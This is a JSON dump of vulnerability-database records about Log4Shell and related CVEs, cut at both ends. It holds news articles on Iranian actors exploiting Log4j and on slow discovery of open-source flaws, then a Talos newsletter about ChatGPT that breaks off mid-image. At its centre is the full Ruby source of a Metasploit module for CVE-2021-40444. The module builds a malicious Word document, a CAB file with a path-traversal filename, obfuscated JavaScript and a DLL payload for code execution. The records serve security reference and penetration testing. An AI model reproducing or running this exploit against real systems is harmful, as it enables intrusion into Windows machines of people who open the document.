Targeting Log4j Flaws in VMware Horizon", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T07:04:51", "id": "THN:833B2B9623F1C64D20868B947E8BE4E0", "href": "https://thehackernews.com/2022/01/nhs-warns-of-hackers-targeting-log4j.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-27T04:02:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhcT1Fv3_9rsWlJzhYEIc-aAf9DOwYWzurFH08RJVRsBNbmiY8efhEcIvJyEPNszIO_Es3Qa8qrlkIe_2A8Ziwxt_V_wM0A3qpxu5qh2cf9s4t_Puk9yEF3slcIwsM2S026HFXf7jWvQPqzqLfN5gNap14AfolPz7hnTurOQpVqlWN9dvNZN6GQJPo5/s728-e100/iran-hackers.jpg>)\n\nIranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability's [long tail](<https://thehackernews.com/2022/06/log4shell-still-being-exploited-to-hack.html>) for remediation.\n\nMicrosoft attributed the latest set of activities to the [umbrella threat group](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) tracked as [MuddyWater](<https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html>) (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is [linked](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) to the Iranian intelligence apparatus, the Ministry of Intelligence and Security (MOIS).\n\nThe attacks are notable for using SysAid Server instances unsecured against the [Log4Shell flaw](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>) as a vector for initial access, [marking](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) a [departure](<https://thehackernews.com/2022/02/iranian-hackers-targeting-vmware.html>) from the actors' pattern of leveraging VMware applications for breaching target environments.\n\n\"After gaining access, Mercury establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack,\" Microsoft [said](<https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/>).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiEY8bFJzA4Vo5E-51T317ysyhNyuELdzWBrMSX0bVcuH0-GwT3rvx98GwUWcYT6uGEZsyl_oC06QFM8jtx_FRCeULg_F5SSrExXHoNNFOqAIcrwmlEf9SHHuVZLnyUBfyTuRX-kSSlrbHLwTncuNKGZSy1TrvW9WDeVw6L8G-Hb_BRt_OO6ebaepJ-/s728-e100/ms.jpg>)\n\nThe tech giant's threat intelligence team said it observed the attacks between July 23 and 25, 2022.\n\nA successful compromise is said to have been followed by the deployment of web shells to execute commands that permit the actor to conduct reconnaissance, establish persistence, steal credentials, and facilitate lateral movement.\n\nAlso employed for command-and-control (C2) communication during intrusions is a remote monitoring and management software called [eHorus](<https://ehorus.com/>) and Ligolo, a [reverse-tunneling tool](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) of choice for the adversary.\n\nThe findings come as the U.S. Department of Homeland Security's Cyber Safety Review Board (CSRB) [deemed](<https://www.dhs.gov/news/2022/07/14/cyber-safety-review-board-releases-report-its-review-log4j-vulnerabilities-and>) the critical vulnerability in the open-source Java-based logging framework an endemic weakness that will continue to plague organizations for years to come as exploitation evolves.\n\nLog4j's [wide usage](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) across many suppliers' software and services means sophisticated adversaries like nation-state actors and commodity operators alike have opportunistically taken advantage of the vulnerability to mount a smorgasbord of attacks.\n\nThe Log4Shell attacks also follow a recent report from Mandiant that detailed an espionage campaign aimed at Israeli shipping, government, energy, and healthcare organizations by a likely Iranian hacking group dubbed [UNC3890](<https://thehackernews.com/2022/08/suspected-iranian-hackers-targeted.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-27T03:23:00", "type": "thn", "title": "Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-27T03:23:28", "id": "THN:DF2B6840863D6847D7088B1A07B19A4A", "href": "https://thehackernews.com/2022/08/iranian-hackers-exploiting-unpatched.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-01T12:06:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhHCMnqhwqPtQNSBXsZfmX7LEVj5u6v9J0m0PEJfwCxouhiIhao2Vs5MVncWuJ98NuxpWT7NguZoYl9dp9C4CsQNISQjl1ik3-HeBH_0aR7VPGsot16xib61mh4OHw6O8pbWPihBxdOnhJUpQ7H8hm9OS6DpuBY_aUAr7qYoai0rNSCjr6TtjWFr_JO/s728-e100/open-source-hacking.jpg>)\n\nLinus Torvalds, the creator of Linux and Git, has his own law in software development, and it goes like this: \"_given enough eyeballs, all bugs are shallow_.\" This phrase puts the finger on the very principle of open source: the more, the merrier - if the code is easily available for anyone and everyone to fix bugs, it's pretty safe. But is it? Or is the saying \"all bugs are shallow\" only true for _shallow_ bugs and not ones that lie deeper? It turns out that security flaws in open source can be harder to find than we thought. Emil W\u00e5reus, Head of R&amp;D at [Debricked](<https://debricked.com>), took it upon himself to look deeper into the community's performance. As the data scientist he is, he, of course, asked the data: _how good is the open source community at finding vulnerabilities in a timely manner_?\n\n## **The thrill of the (vulnerability) hunt**\n\nFinding open source vulnerabilities is typically done by the maintainers of the open source project, users, auditors, or external security researchers. But despite these great code-archaeologists helping secure our world, the community still struggles to find security flaws. \n\nOn average, it takes _over 800 days_ to discover a security flaw in open source projects. For instance, the infamous Log4shell (CVE-2021-44228) vulnerability was undiscovered for a whopping 2649 days. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiDV6UV2i1t5HF7EMQs8N5wywO9YTWCb3M_uB1ZqwVnkPDzieuVEda7tkHRQiw41mhCnz3SBVnaReHEMH2fUQNCCC_Z4S-6KYh_KH5nY-f0od8kkYPj9BWh2JjUSdnMcPRqovKz6tSxPy6tCA2_5c-bO52_9kby2Ci3hqk0g9VcmKTnSJUmn4KFxJgW/s728-e100/FLAWS.jpg>)\n\nThe analysis shows that 74% of security flaws are actually undiscovered for at least one year! Java and Ruby seem to have the most challenges here, as it takes the community more than 1000 days to find and disclose vulnerabilities. Our [white] hats go off to the PHP/Composer community, which slightly outperforms the others. \n\n## **The needle in a techstack**\n\nOther interesting factors are that some of the different weakness types (CWE) seem to be harder to find and disclose, which actually contradicts Linus's law. The weakness types CWE-400 (Uncontrolled Resource Consumption) and CWE-502 (Deserialization of Untrusted Data) typically aren't localized to a single function or may appear as intended logic in the application. In other words, it can't be considered \"a shallow bug.\" \n\nIt also seems that the developer community is a bit better at finding CWE-20 (Improper Input Validation), where the flaw most of the time is just a few lines of code in a single function. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjMcHcgVAMCZdOLqkgBI2vwxfxloDUpyM00TN6hWNXm2XuP6xMEA6rxvm6SSzpLbxnWheflWn2NzzpG28KssHYhTkxqvgPCreYfJUptqQ466Jvgjav1oC_3pRbCDqLGVNtbUmUGhmdO_mv8yRBolaXWeQr91wJXBpvD3XjYa4h945ZbgYI8puChOJYh/s728-e100/bugs.jpg>)\n\n## **Solve vulnerabilities with powerful remediation **\n\nWhy does this matter? As consumers of open source, and that's about every company in the whole world, the problem of vulnerabilities in open source is an important one. The data tells us that we can't fully trust Linus' Law - not because open source is less secure than other software, but because **not all bugs are shallow**.\n\nLuckily, there are powerful tools to perform at-scale analysis of a lot of open source projects at once. There have been [[white knight hackers disclose 1000's](<https://www.youtube.com/watch?v=WkdzWiNKzt8>)] of vulnerabilities at once using these methods. It would be naive to not assume that ill-minded organizations and individuals do the same. As an ecosystem that lays the foundation for our software-centric world, the community must improve its ability to find, disclose, and fix security flaws in open source significantly. \n\nLast year, [Google committed $10 billion](<https://blog.google/technology/safety-security/why-were-committing-10-billion-to-advance-cybersecurity/>) to an open source fund to help secure open source with a specific curator role to work alongside the maintainers with specific security efforts. \n\nFurthermore, Debricked helps companies make these vulnerabilities actionable by scanning all your software, every branch, every push, and every commit, for new (open source) vulnerabilities. Debricked even continuously scans all your old commits for every new vulnerability, to make sure they bring up-to-date, accurate, and actionable intelligence on the open source you consume. Debricked even helps developers fix your security flaws with automated pull requests that won't cause dependency hell; pretty neat! \n\n## The truth lies in the data\n\nSo, knowing all this, what is the best way to protect your project or company against open source vulnerabilities? As we've seen in the case of Log4j and Spring4shell as well as the numbers, we can never really trust that the community will find and fix all risks. There's a good chance that there are lots and lots of undiscovered and undisclosed vulnerabilities in your code today, and there's not much you can do about it. \n\nAccording to Debricked, the best way to mitigate this is by implementing continuous vulnerability scanning to your SDLC. By automatically scanning at every push of code, in combination with the machine learning-powered [vulnerability database](<https://debricked.com/vulnerability-database>). This makes sure you're updated in real-time, you'll know about new vulnerabilities before anyone else does. As soon as there's a fix, you can generate a [Fix Pull Request](<https://debricked.com/blog/debricked-launching-automatic-fix-pull-request/>) automatically or solve it manually with Debricked's help. _Currently, Debricked offers remediation for JavaScript and Go, with more language support is to come shortly. _\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-01T12:04:00", "type": "thn", "title": "Last Years Open Source - Tomorrow's Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-01T12:04:08", "id": "THN:161777F5DB73EF3AB5B13EF9F11E3374", "href": "https://thehackernews.com/2022/11/last-years-open-source-tomorrows.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-24T15:44:17", "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n", "cvss3": {}, "published": "2021-11-09T11:18:58", "type": "metasploit", "title": "Microsoft Office Word Malicious MSHTML RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-08T22:22:44", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_mshtml_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_mshtml_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2023-03-24T20:18:32", "description": "\n\nWelcome to this week&#x27;s edition of the Threat Source newsletter.\n\nThere is no shortage of [hyperbolic headlines](<https://www.businessinsider.com/chatgpt-jobs-at-risk-replacement-artificial-intelligence-ai-labor-trends-2023-02?ref=blog.talosintelligence.com>) about ChatGPT out there, everything from how it and other AI tools like it are here to replace all our jobs, make college essays a thing of the past and change the face of cybersecurity as we know it.\n\nIt&#x27;s the talk of SEO managers everywhere who can&#x27;t wait to find a way to work &quot;ChatGPT&quot; into a headline. And in the security community, everyone is concerned that AI models will help attackers get smarter, faster or more dangerous.\n\nThe biggest issue I&#x27;m seeing with that is these tools aren&#x27;t that smart.\n\nOther writers have done a [far more eloquent](<https://www.theatlantic.com/technology/archive/2022/12/chatgpt-openai-artificial-intelligence-writing-ethics/672386/?ref=blog.talosintelligence.com>) and interesting job than I can in a few dozen words here about [how bad these models are at writing creatively or interpreting human emotion](<https://www.vice.com/en/article/bvmk9m/everybody-please-calm-down-about-chatgpt?ref=blog.talosintelligence.com>), but I wanted to put my own spin on things with my incredibly niche interests and use case for ChatGPT.\n\nFirst, I asked it to help me write this newsletter. While it politely declined to do the whole thing for me because it can&#x27;t produce something on Talos&#x27; behalf, it did start to compile a list of &quot;the top stories we&#x27;re following this week.&quot;\n\n![Threat Source newsletter \\(March 9, 2023\\) \u2014 Stop freaking out about ChatGPT](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAA3YAAAN3CAYAAAB+8cgoAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAP+lSURBVHhe7J0FvBVFF8CHEhQ/SkXCbrFARURQVBBERcHGQsECCenu7hIULMLAQkUFpVtQQEBQUEIQkZRQWuHb/7k7j337buy974FcPP/3u7/7dnbv7sSZODNnzmbavXvPIaMoiqIoiqIoiqIkLZndb0VRFEVRFEVRFCVJUcVOURRFURRFURQlyVHFTlEURVEURVEUJclRxU5RFEVRFEVRFCXJUcVOURRFURRFURQlyVHFTlEURVEURVEUJclRxU5RFEVRFEVRFCXJUcVOURRFURRFURQlyVHFTlEURVEURVEUJclRxU5RFEVRFEVRFCXJUcVOURRFURRFURQlyVHFTlEURVEURVEUJclRxU5RFEVRFEVRFCXJUcVOURRFURRFURQlyVHFTlEURVEURVEUJclRxU5RFEVRFEVRFCXJUcVOOWb54qvJZvnPK92jf5djKS5B+PPPv8zqNb+avfv2uSFKvKz+Za2U+4G//3ZDFEVRFEVRjl0y7d6955D7v5JkfDVxmmnfta97FOLKyy81V11RxNx4w3Xm8iIXu6FHl2kz55jmbbu5R+Gp/dyT5pEHK7tH4bmhbGVT/fGHzNNPVnVDMpYBL79hRn04xj0Kz9CB3SUfj3RcYvH90mXyfcVll8h3JLiudceeZtPmrW6IMVcXvdy0a9HAnHpKPjdECcIHH39h+r70qvnqk7fM//53shuqKIqiKIpybKIrdknMwYMH5btKpdtNjWoPm4fvv9ts377DjHz3I/NsnaZm2fIVcv5oc9YZhSQ+9lOoYAFz0kknpgq77F9SOr1cW+zKVHGCiy88P1XYaaeeIuH/NoOGDpdPNNb++pt5rm4z89eu3aZ+7WdMj04tzWMP32sWLFxinn6hcYq8KIqiKIqiKMcfqtgdB9xf5U5T44mHTd2a1c2o4YNllQkatuhotmz9Q/4/mpx7zlkSH/s575wzzan58qYKu+ryS92rjTl0KOMXjYPc84brr00VJ2BFzBt2ev5TJTxeEk1TevJi7ryF8t2vezvzgCMTpUsWN7WeeUJWR1nBW/LDcjl/pDgS5RiJfyN/4yXcs47m8xVFURRF+W+hit1xCKaDHVo1NNu27zBTZ3zthob46NOx5vl6zQ2mhU3bdDVzvl3gngnx4/KfzYtN2plylaqaO++rZtp06i33sbTq0FPM04a/86Gcr9OojXsmfjAlfer5hqZUuSrm4Wq1zMuvjTT//POPezYtu3bvNoOHDjePVq8j8SMu3y5Y5J4NsXDxUlO7YSu55/2PPW8GvvJmhu0zI26DXx0h6ebTpddLKffevXuPxOvTz8eLeextdz8ieQRr1q4zXZ1riTPpJA179uyVc7B//37z6rB35BzxrlGrsRk3foqcI++57+IlP8qH/18fPkrO+Vnz6zr5PtdRpL3cfWd5071DC5P/tMNK6i9unEhH5YdrmO59B5t1v/3unjVm6JvvmPrN2rtHIbb+sU2eP33WXDl+94NPpfxmzZlnnnjmRYm7LT/kCnNc5Ix0UQ779u2XcyBl6eQl58gX8pIVx0h8t2hpyrOROZ61yMkP8D4L2f7wky8k3BItfy1MgPTqPySlbIe8/pY5cOCAe/Yw0Z4VTQaOpFwqiqIoiqKAKnbHKbfcdIN8/7DsZ/mGd97/xPQeMNTk+t/JYmb4++8bTYNmHVJWcjZs3CyD3nXrN5iqD9wjKz4Tp8y